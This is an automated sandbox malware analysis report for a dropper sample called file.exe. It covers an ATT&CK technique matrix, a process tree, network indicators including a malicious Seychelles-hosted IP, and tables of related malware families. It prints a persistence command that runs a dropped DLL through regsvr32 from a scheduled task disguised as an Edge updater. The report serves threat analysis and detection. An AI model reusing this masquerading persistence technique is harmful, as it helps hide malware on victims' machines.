Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 16_2_00007FFDFB2AE2E0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,16_2_00007FFDFB2AE2E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes,16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exe | Code function: 16_2_00007FFDFB215BE0 memset,RtlGetVersion,16_2_00007FFDFB215BE0
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: regsvr32.exe, 00000010.00000003.2325195653.0000000003881000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
Windows Service
1
Windows Service
1
Deobfuscate/Decode Files or Information
LSASS Memory137
System Information Discovery
Remote Desktop ProtocolData from Removable Media21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
Logon Script (Windows)213
Process Injection
2
Obfuscated Files or Information
Security Account Manager1
Network Share Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell
Login HookLogin Hook1
DLL Side-Loading
NTDS141
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading
LSA Secrets2
Process Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
Virtualization/Sandbox Evasion
Cached Domain Credentials141
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items213
Process Injection
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Regsvr32
Proc Filesystem2
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1559884 | Sample: file.exe | Startdate: 21/11/2024 | Architecture: WINDOWS | Score: 80

DNS/IP (top level): the.earth.li
Signatures (top level): Sigma detected: Powershell launch regsvr32; Sigma detected: Potentially Suspicious Child Process Of Regsvr32; AI detected suspicious sample

Process tree (numbers after a process name are the created registry value / created file counts explained in the legend):

  • file.exe 2 (started)
    • dropped: C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32
    • file.tmp 3 4 (started)
      • dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32
      • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
      • cmd.exe 1 (started)
        • file.exe 2 (started)
          • dropped: C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32
          • file.tmp 21 7 (started)
            • dropped: C:\Users\user\AppData\Roaming\is-D8FFC.tmp, PE32+
            • dropped: C:\Users\user\...\PoisedCoyote.dll (copy), PE32+
            • dropped: C:\Users\user\AppData\...\unins000.exe (copy), PE32
            • dropped: 3 other files (none is malicious)
            • regsvr32.exe (started)
              • regsvr32.exe 14 3 (started)
                • DNS/IP: 154.216.19.129, 49736, 49740, 49753 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles
                • DNS/IP: the.earth.li 93.93.131.124, 443, 49738, 49739 MYTHICMythicBeastsLtdGB United Kingdom
                • signature: System process connects to network (likely due to code injection or exploit)
                • signature: Suspicious powershell command line found
                • signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                • signature: Sets debug register (to hijack the execution of another thread)
                • powershell.exe 37 (started)
                  • signature: Loading BitLocker PowerShell Module
                  • conhost.exe (started)
                • powershell.exe 37 (started)
                  • conhost.exe (started)
        • conhost.exe (started)
        • timeout.exe 1 (started)
  • regsvr32.exe (started)
    • signature: Suspicious powershell command line found
    • powershell.exe (started)
      • signature: Loading BitLocker PowerShell Module
      • conhost.exe (started)

Source | Detection | Scanner | Label
file.exe | 0% | ReversingLabs
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp | 2% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp | 2% | ReversingLabs
C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy) | 3% | ReversingLabs
C:\Users\user\AppData\Roaming\is-D8FFC.tmp | 3% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://cacerts.digicert.c | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
the.earth.li | 93.93.131.124 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.dr | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.msn.com/q | regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://api.msn.com:443/v1/news/Feed/Windows? | regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://docs.rs/getrandom#nodejs-es-module-support | file.tmp, 00000006.00000003.1789026333.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp, is-D8FFC.tmp.6.dr | false | - | high
http://cacerts.digicert.c | regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmp | false
                                      high
                                      http://www.microsoft.cpowershell.exe, 00000009.00000002.1921586400.0000021FACAA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.remobjects.com/psfile.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
154.216.19.129 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
93.93.131.124 | the.earth.li | United Kingdom | 44684 | MYTHICMythicBeastsLtdGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559884
Start date and time: 2024-11-21 02:57:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal80.evad.winEXE@26/24@1/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 48
• Number of non-executed functions: 49
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7736 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8100 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:58:25 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88} path: regsvr32 s>/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
20:58:13 | API Interceptor | 73x Sleep call for process: powershell.exe modified
20:58:52 | API Interceptor | 466838x Sleep call for process: regsvr32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
93.93.131.124 | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
93.93.131.124 | doc.doc | malicious | Unknown | the.earth.li/~sgtatham/putty/latest/w64/putty.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
the.earth.li | setup.exe | malicious | Amadey | 93.93.131.124
the.earth.li | Wzphku.exe | malicious | Unknown | 93.93.131.124
the.earth.li | Wzphku.exe | malicious | Unknown | 93.93.131.124
the.earth.li | epah.hta | malicious | Unknown | 93.93.131.124
the.earth.li | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | 93.93.131.124
the.earth.li | client_1.hta | malicious | Unknown | 93.93.131.124
the.earth.li | client_3.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | Informazion.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | 827837hj.xls | malicious | Unknown | 93.93.131.124
the.earth.li | doc.doc | malicious | Unknown | 93.93.131.124
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MYTHICMythicBeastsLtdGB | setup.exe | malicious | Amadey | 93.93.131.124
MYTHICMythicBeastsLtdGB | Wzphku.exe | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | Wzphku.exe | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | epah.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | client_1.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | client_3.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | Informazion.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 827837hj.xls | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 7XlWWSA2LU.dll | malicious | Wannacry | 93.93.132.33
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 154.216.19.141
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | dvwkja7.elf | malicious | Mirai | 154.216.16.109
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.gov | malicious | HTMLPhisher | 154.216.17.193
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20though | malicious | Unknown | 154.216.17.193
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | new.bat | malicious | Unknown | 154.216.17.175
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | dvwkja7.elf | malicious | Mirai | 154.216.16.109
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | wnbw86.elf | malicious | Mirai | 154.216.16.109
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | vqsjh4.elf | malicious | Mirai | 154.216.16.109
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | jwwofba5.elf | malicious | Mirai | 154.216.16.109
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | qkehusl.elf | malicious | Mirai | 154.216.16.109
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://tally.so/widgets/embed.js | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | Lreticupdwy.exe | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | Lreticupdwy.exe | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | https://www.cbirc.gov.cn/cn/view/pages/index/index.html | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | BOA-everbridge.com-$29,890.html | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | PNSBt.js | malicious | AsyncRAT | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | LETA_pdf.vbs | malicious | AsyncRAT, PureLog Stealer | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | plutonium.exe | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | ahmbf.ps1 | malicious | Unknown | 93.93.131.124
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | file.exe | malicious | Nymaim, Socks5Systemz
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | hkQx7f6zzw.exe | malicious | TVrat
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | hkQx7f6zzw.exe | malicious | TVrat
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | aeyh21MAtA.exe | malicious | TVrat
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | aeyh21MAtA.exe | malicious | TVrat
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | aesM8nmCM2.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | OFjT8HmzFJ.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | BJqvg1iEdr.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp | iv2Mm5SEJF.exe | malicious | Socks5Systemz
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
